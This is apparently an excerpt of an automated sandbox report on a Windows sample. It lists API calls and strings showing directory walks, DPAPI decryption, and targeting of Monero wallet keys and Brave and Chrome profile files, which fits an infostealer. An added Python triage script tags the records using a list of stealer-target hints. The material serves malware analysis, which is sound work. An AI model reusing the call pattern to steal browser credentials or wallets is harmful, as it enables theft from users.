                                  • Opcode ID: 29bc000fa47fe61c9d7d28c0dccf5522ac1a77b52bb4d5d93d13f937662b1f36
                                  • Instruction ID: 1f4d1be204028744052be61b15c93d229986e0c3cc9f52ba6ffe621d306f79f0
                                  • Opcode Fuzzy Hash: 29bc000fa47fe61c9d7d28c0dccf5522ac1a77b52bb4d5d93d13f937662b1f36
                                  • Instruction Fuzzy Hash: D86167B2900219ABCB24FBA0DC49FEE73BCBB58701F048688F54996141EB75DB45CF91
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00A84580
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00A84587
                                  • wsprintfA.USER32 ref: 00A845A6
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00A845BD
                                  • StrCmpCA.SHLWAPI(?,00A90FC4), ref: 00A845EB
                                  • StrCmpCA.SHLWAPI(?,00A90FC8), ref: 00A84601
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00A8468B
                                  • FindClose.KERNEL32(000000FF), ref: 00A846A0
                                  • lstrcat.KERNEL32(?,0068F500), ref: 00A846C5
                                  • lstrcat.KERNEL32(?,0068DA60), ref: 00A846D8
                                  • lstrlen.KERNEL32(?), ref: 00A846E5
                                  • lstrlen.KERNEL32(?), ref: 00A846F6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                  • String ID: %s\%s$%s\*
                                  • API String ID: 671575355-2848263008
                                  • Opcode ID: 7548ef2afb1db810aae427a82bf4abbde57ad37fd2bc3903c53148815166f62d
                                  • Instruction ID: a0561a8659d1e1c280e7ad5e31ffaa502d57e77d8d822d1a509179552148b648
                                  • Opcode Fuzzy Hash: 7548ef2afb1db810aae427a82bf4abbde57ad37fd2bc3903c53148815166f62d
                                  • Instruction Fuzzy Hash: 1F5156B1940218ABCB24FB70DD89FED737CAB58700F404698F64D96190EF759B848F92
                                  APIs
                                  • wsprintfA.USER32 ref: 00A83EC3
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00A83EDA
                                  • StrCmpCA.SHLWAPI(?,00A90FAC), ref: 00A83F08
                                  • StrCmpCA.SHLWAPI(?,00A90FB0), ref: 00A83F1E
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00A8406C
                                  • FindClose.KERNEL32(000000FF), ref: 00A84081
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 180737720-4073750446
                                  • Opcode ID: efb7b6de6d4cb0d8741d668f9b68669771fb4d9059ad6927189178e631fc5583
                                  • Instruction ID: 63f40866ba8aea0327062351b26d031428d2944217c0944e622e3636a2daf512
                                  • Opcode Fuzzy Hash: efb7b6de6d4cb0d8741d668f9b68669771fb4d9059ad6927189178e631fc5583
                                  • Instruction Fuzzy Hash: B95128B2900218ABCB24FBB0DD45FEE737CBB58700F408699B65996080EB759B858F91
                                  APIs
                                  • wsprintfA.USER32 ref: 00A7ED3E
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00A7ED55
                                  • StrCmpCA.SHLWAPI(?,00A91538), ref: 00A7EDAB
                                  • StrCmpCA.SHLWAPI(?,00A9153C), ref: 00A7EDC1
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00A7F2AE
                                  • FindClose.KERNEL32(000000FF), ref: 00A7F2C3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\*.*
                                  • API String ID: 180737720-1013718255
                                  • Opcode ID: b7c4be9787416f79ff3b7cbd68a690ec400182a2847246fe3609ba076c024335
                                  • Instruction ID: 9bb892ff3d14f211fe253366a2e95cccc3c8bf5667a2c9efdfd8f44e256ea73f
                                  • Opcode Fuzzy Hash: b7c4be9787416f79ff3b7cbd68a690ec400182a2847246fe3609ba076c024335
                                  • Instruction Fuzzy Hash: B5E1B4729111189AFB55FB60DD52EEE737CAF64300F4045DAB50A62092EF346F8ACF62
                                  APIs
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                    • Part of subcall function 00A8A920: lstrcpy.KERNEL32(00000000,?), ref: 00A8A972
                                    • Part of subcall function 00A8A920: lstrcat.KERNEL32(00000000), ref: 00A8A982
                                    • Part of subcall function 00A8A9B0: lstrlen.KERNEL32(?,006888B8,?,\Monero\wallet.keys,00A90E17), ref: 00A8A9C5
                                    • Part of subcall function 00A8A9B0: lstrcpy.KERNEL32(00000000), ref: 00A8AA04
                                    • Part of subcall function 00A8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A8AA12
                                    • Part of subcall function 00A8A8A0: lstrcpy.KERNEL32(?,00A90E17), ref: 00A8A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00A915B8,00A90D96), ref: 00A7F71E
                                  • StrCmpCA.SHLWAPI(?,00A915BC), ref: 00A7F76F
                                  • StrCmpCA.SHLWAPI(?,00A915C0), ref: 00A7F785
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00A7FAB1
                                  • FindClose.KERNEL32(000000FF), ref: 00A7FAC3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID: prefs.js
                                  • API String ID: 3334442632-3783873740
                                  • Opcode ID: d3e825d1fefc2604ea8caabfb5279972cdf76be8dac904000ef1a4240af23f56
                                  • Instruction ID: aca9e55dc93cbab5c6c9afbc863e7dc254880fb7d9723e0ed55f867fd868b0fb
                                  • Opcode Fuzzy Hash: d3e825d1fefc2604ea8caabfb5279972cdf76be8dac904000ef1a4240af23f56
                                  • Instruction Fuzzy Hash: 3FB12271A001189FDB24FF64DD96FEE7379AF64300F4085A9E40E96191EF346B49CBA2
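The function records above all share a small set of call patterns: a host-identity routine (GetComputerNameA, GetUserNameA, then ExitProcess), several FindFirstFileA / StrCmpCA / StrCmpCA / FindNextFileA / FindClose loops built around "%s\*"-style format strings, a loop that also calls CopyFileA and DeleteFileA, and string references to Brave, Google Chrome, Preferences, prefs.js and \Monero\wallet.keys. The script below is an added triage example, not Joe Sandbox code and not code recovered from the sample: it parses the "APIs" and "String ID" lines of such records and tags each function with the behaviour its call pattern implies. Its SAMPLE input is a hand-copied excerpt of four records from this section. Two things are assumptions of mine rather than facts the report states: that the pair of StrCmpCA calls between FindFirstFileA and FindNextFileA is the usual skip of the "." and ".." entries (the report only shows the addresses of the compared constants, e.g. 00A90F70 and 00A90F74), and the TARGET_HINTS list of substrings treated as stealer targets.

```python
import re
from dataclasses import dataclass, field

# Constructed sample input: hand-copied excerpts of four function records from this report.
SAMPLE = r"""
APIs
  • Part of subcall function 00A878E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00A8792F
  • Part of subcall function 00A87850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00A8789F
• ExitProcess.KERNEL32 ref: 00A711C6
• String ID:
APIs
• wsprintfA.USER32 ref: 00A838CC
• FindFirstFileA.KERNEL32(?,?), ref: 00A838E3
• StrCmpCA.SHLWAPI(?,00A90F70), ref: 00A83947
• StrCmpCA.SHLWAPI(?,00A90F74), ref: 00A8395D
• FindNextFileA.KERNEL32(000000FF,?), ref: 00A83C67
• FindClose.KERNEL32(000000FF), ref: 00A83C7C
• String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
APIs
  • Part of subcall function 00A8A9B0: lstrlen.KERNEL32(?,006888B8,?,\Monero\wallet.keys,00A90E17), ref: 00A8A9C5
• FindFirstFileA.KERNEL32(00000000,?,00A90B32,00A90B2B,00000000,?,?,?,00A913F4,00A90B2A), ref: 00A7BEF5
• StrCmpCA.SHLWAPI(?,00A913F8), ref: 00A7BF4D
• StrCmpCA.SHLWAPI(?,00A913FC), ref: 00A7BF63
• FindNextFileA.KERNEL32(000000FF,?), ref: 00A7C7BF
• FindClose.KERNEL32(000000FF), ref: 00A7C7D1
• String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
APIs
• FindFirstFileA.KERNEL32(00000000,?,00000000,?), ref: 00A71923
• StrCmpCA.SHLWAPI(?,00A9525C), ref: 00A71973
• StrCmpCA.SHLWAPI(?,00A95304), ref: 00A71989
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00A71D40
• DeleteFileA.KERNEL32(00000000), ref: 00A71DCA
• FindNextFileA.KERNEL32(000000FF,?), ref: 00A71E20
• FindClose.KERNEL32(000000FF), ref: 00A71E32
• String ID:
"""

# One "APIs" bullet: optional "Part of subcall function X:" prefix, Api.MODULE, optional (args), ref: ADDR
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)
STR_RE = re.compile(r"^\s*•\s*String ID:\s*(?P<ids>.*)$")

# Hypothetical hint list (mine, not from the report): substrings that mark stealer targets.
TARGET_HINTS = ("wallet", "Preferences", "prefs.js", "Brave", "Google Chrome", "Login Data", "cookies")


@dataclass
class FuncRecord:
    calls: list = field(default_factory=list)    # (api, module, args, ref, from_subcall)
    strings: list = field(default_factory=list)  # "String ID" entries, split on "$"


def parse_records(text):
    """Split a report fragment into per-function records; each record starts at an 'APIs' line."""
    records = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            records.append(FuncRecord())
        elif records and (m := API_RE.match(line)):
            records[-1].calls.append((m["api"], m["mod"], m["args"] or "", m["ref"], m["sub"] is not None))
        elif records and (m := STR_RE.match(line)):
            records[-1].strings.extend(s for s in m["ids"].split("$") if s)
    return records


def classify(rec):
    """Map the call pattern of one record to behaviour tags."""
    tags, apis = [], {c[0] for c in rec.calls}
    direct = [c[0] for c in rec.calls if not c[4]]           # calls the function makes itself, in order
    if apis & {"GetComputerNameA", "GetUserNameA"}:
        tags.append("host-fingerprint")
        if "ExitProcess" in apis:
            tags.append("exit-after-fingerprint")            # reads host identity, then can terminate
    if {"FindFirstFileA", "FindNextFileA", "FindClose"} <= apis:
        tag = "directory-walk"
        if "FindFirstFileA" in direct and "FindNextFileA" in direct:
            between = direct[direct.index("FindFirstFileA"):direct.index("FindNextFileA")]
            # Assumption: two StrCmpCA calls inside the loop are the "." / ".." skip; the report
            # shows only the addresses of the compared constants, not their contents.
            if between.count("StrCmpCA") >= 2:
                tag += "+dot-filter"
        if any(s.endswith("\\*") or s.endswith("\\*.*") for s in rec.strings):
            tag += "+wildcard"                               # "%s\*" pattern: enumerates a whole directory
        tags.append(tag)
    if {"CopyFileA", "DeleteFileA"} <= apis:
        tags.append("copy-then-delete")                      # CopyFileA and DeleteFileA inside the same loop
    pool = rec.strings + [c[2] for c in rec.calls]           # string IDs plus literal arguments
    hits = sorted({h for h in TARGET_HINTS if any(h.lower() in t.lower() for t in pool)})
    if hits:
        tags.append("targets:" + ",".join(hits))
    return tags


def triage(text):
    """Return [(address of the record's first direct call, tags)] for every record in the fragment."""
    out = []
    for rec in parse_records(text):
        direct = [c for c in rec.calls if not c[4]]
        anchor = (direct or rec.calls)[0][3] if rec.calls else "?"
        out.append((anchor, classify(rec)))
    return out


if __name__ == "__main__":
    for anchor, tags in triage(SAMPLE):
        print(anchor, " ".join(tags))
```

To run it over a whole report, feed the saved text of the "Execution Graph" function listing in place of SAMPLE; the parser ignores every line that is not an "APIs" header, an API bullet or a "String ID" bullet, so the Memory Dump Source and hash lines need no stripping. The tags are heuristics for prioritising which functions to open in the disassembler, not verdicts: a benign file indexer produces the same directory-walk signature, and only the combination with the wallet and browser-profile strings and the copy-then-delete loop is what makes this listing read like a stealer.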
                                  APIs
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00A9510C,?,?,?,00A951B4,?,?,00000000,?,00000000), ref: 00A71923
                                  • StrCmpCA.SHLWAPI(?,00A9525C), ref: 00A71973
                                  • StrCmpCA.SHLWAPI(?,00A95304), ref: 00A71989
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00A71D40
                                  • DeleteFileA.KERNEL32(00000000), ref: 00A71DCA
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00A71E20
                                  • FindClose.KERNEL32(000000FF), ref: 00A71E32
                                    • Part of subcall function 00A8A920: lstrcpy.KERNEL32(00000000,?), ref: 00A8A972
                                    • Part of subcall function 00A8A920: lstrcat.KERNEL32(00000000), ref: 00A8A982
                                    • Part of subcall function 00A8A9B0: lstrlen.KERNEL32(?,006888B8,?,\Monero\wallet.keys,00A90E17), ref: 00A8A9C5
                                    • Part of subcall function 00A8A9B0: lstrcpy.KERNEL32(00000000), ref: 00A8AA04
                                    • Part of subcall function 00A8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A8AA12
                                    • Part of subcall function 00A8A8A0: lstrcpy.KERNEL32(?,00A90E17), ref: 00A8A905
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                  • String ID: \*.*
                                  • API String ID: 1415058207-1173974218
                                  APIs
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                    • Part of subcall function 00A8A9B0: lstrlen.KERNEL32(?,006888B8,?,\Monero\wallet.keys,00A90E17), ref: 00A8A9C5
                                    • Part of subcall function 00A8A9B0: lstrcpy.KERNEL32(00000000), ref: 00A8AA04
                                    • Part of subcall function 00A8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A8AA12
                                    • Part of subcall function 00A8A8A0: lstrcpy.KERNEL32(?,00A90E17), ref: 00A8A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00A90C2E), ref: 00A7DE5E
                                  • StrCmpCA.SHLWAPI(?,00A914C8), ref: 00A7DEAE
                                  • StrCmpCA.SHLWAPI(?,00A914CC), ref: 00A7DEC4
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00A7E3E0
                                  • FindClose.KERNEL32(000000FF), ref: 00A7E3F2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                  • String ID: \*.*
                                  • API String ID: 2325840235-1173974218
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: "juv$/1~$1:y$3`?$Mv?$R\$ZXW$gHL$n8~$tb}u
                                  • API String ID: 0-1092568616
                                  APIs
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                    • Part of subcall function 00A8A920: lstrcpy.KERNEL32(00000000,?), ref: 00A8A972
                                    • Part of subcall function 00A8A920: lstrcat.KERNEL32(00000000), ref: 00A8A982
                                    • Part of subcall function 00A8A9B0: lstrlen.KERNEL32(?,006888B8,?,\Monero\wallet.keys,00A90E17), ref: 00A8A9C5
                                    • Part of subcall function 00A8A9B0: lstrcpy.KERNEL32(00000000), ref: 00A8AA04
                                    • Part of subcall function 00A8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A8AA12
                                    • Part of subcall function 00A8A8A0: lstrcpy.KERNEL32(?,00A90E17), ref: 00A8A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00A914B0,00A90C2A), ref: 00A7DAEB
                                  • StrCmpCA.SHLWAPI(?,00A914B4), ref: 00A7DB33
                                  • StrCmpCA.SHLWAPI(?,00A914B8), ref: 00A7DB49
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00A7DDCC
                                  • FindClose.KERNEL32(000000FF), ref: 00A7DDDE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID:
                                  • API String ID: 3334442632-0
                                  APIs
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                  • GetKeyboardLayoutList.USER32(00000000,00000000,00A905AF), ref: 00A87BE1
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00A87BF9
                                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 00A87C0D
                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00A87C62
                                  • LocalFree.KERNEL32(00000000), ref: 00A87D22
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                  • String ID: /
                                  • API String ID: 3090951853-4001269591
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: &:u$+r~}$7e9$J*V?$co'$xpW|$-_
                                  • API String ID: 0-2483857470
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: )!w|$5?$7.\_$zXz$+/$5/?$i??
                                  • API String ID: 0-3326637294
                                  APIs
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                    • Part of subcall function 00A8A920: lstrcpy.KERNEL32(00000000,?), ref: 00A8A972
                                    • Part of subcall function 00A8A920: lstrcat.KERNEL32(00000000), ref: 00A8A982
                                    • Part of subcall function 00A8A9B0: lstrlen.KERNEL32(?,006888B8,?,\Monero\wallet.keys,00A90E17), ref: 00A8A9C5
                                    • Part of subcall function 00A8A9B0: lstrcpy.KERNEL32(00000000), ref: 00A8AA04
                                    • Part of subcall function 00A8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A8AA12
                                    • Part of subcall function 00A8A8A0: lstrcpy.KERNEL32(?,00A90E17), ref: 00A8A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00A90D73), ref: 00A7E4A2
                                  • StrCmpCA.SHLWAPI(?,00A914F8), ref: 00A7E4F2
                                  • StrCmpCA.SHLWAPI(?,00A914FC), ref: 00A7E508
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00A7EBDF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                  • String ID: \*.*
                                  • API String ID: 433455689-1173974218
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: &_?$43x$J#3l$WU]$Yrf;$n6d9
                                  • API String ID: 0-2176626836
                                  • Opcode ID: 1a74a3f00fd2473d58d661e847db8f3b5f003666a3e1440885d360bcf8198596
                                  • Instruction ID: f935caa9ca3a85e566179f3b39bbfdaf2e6f03312d86487354e524ee7754c546
                                  • Opcode Fuzzy Hash: 1a74a3f00fd2473d58d661e847db8f3b5f003666a3e1440885d360bcf8198596
                                  • Instruction Fuzzy Hash: 89A2F7F3A0C214AFE304AE2DEC8567ABBE9EF94720F1A453DE6C4C7744E63558018697
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                   • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: o?_$'K;$:b[O$WHmu$uMmm
                                  • API String ID: 0-3036676330
                                  • Opcode ID: 4a5f904b740d255d3b0abd1842105bf1a1da71c02a7cfdaaaf2c55b7e63a3239
                                  • Instruction ID: adcfcc5adbb576c5983e4f343e00739a4ff27e32c715b65f8e866f13311bc14a
                                  • Opcode Fuzzy Hash: 4a5f904b740d255d3b0abd1842105bf1a1da71c02a7cfdaaaf2c55b7e63a3239
                                  • Instruction Fuzzy Hash: 20B214F360C204AFE3046E2DEC8567ABBE9EF94720F1A493DE6C4C3744E63599058697
                                  APIs
                                  • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00A7C871
                                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00A7C87C
                                  • lstrcat.KERNEL32(?,00A90B46), ref: 00A7C943
                                  • lstrcat.KERNEL32(?,00A90B47), ref: 00A7C957
                                  • lstrcat.KERNEL32(?,00A90B4E), ref: 00A7C978
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                   • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$BinaryCryptStringlstrlen
                                  • String ID:
                                  • API String ID: 189259977-0
                                  • Opcode ID: f3509c5bd254974bf69704946079b01a4a48ba9f35d93c21097a832a526f0600
                                  • Instruction ID: af49d1a038a4fb2e596c4fadd26fda9020b3664ee28d226ca7088bdb4e79d22b
                                  • Opcode Fuzzy Hash: f3509c5bd254974bf69704946079b01a4a48ba9f35d93c21097a832a526f0600
                                  • Instruction Fuzzy Hash: A94143B590421AEFDB10DF94DD89BEEB7B8BB44744F1046A8F609A6280D7705A84CF91
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00A7724D
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00A77254
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00A77281
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00A772A4
                                  • LocalFree.KERNEL32(?), ref: 00A772AE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                   • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                  • String ID:
                                  • API String ID: 2609814428-0
                                  • Opcode ID: 1ae4ef0ce62a2409f50d7ee2ae4aa9027867f327671d86104af7bc5cf0dd802c
